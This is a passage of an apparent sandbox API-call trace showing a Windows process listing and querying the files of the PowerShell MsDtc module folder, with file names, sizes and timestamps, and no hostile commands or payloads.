ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.003] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.003] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.004] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.004] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.004] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.004] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0265.004] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 0 [0265.005] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.005] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0265.005] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0265.005] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.005] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.005] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.006] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.007] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.008] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.008] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.008] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0265.008] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.008] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.008] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0265.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.008] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.009] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0265.009] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0265.009] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.009] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.009] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.009] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.009] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0265.010] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0265.010] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.010] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.010] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.010] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.011] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.011] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: 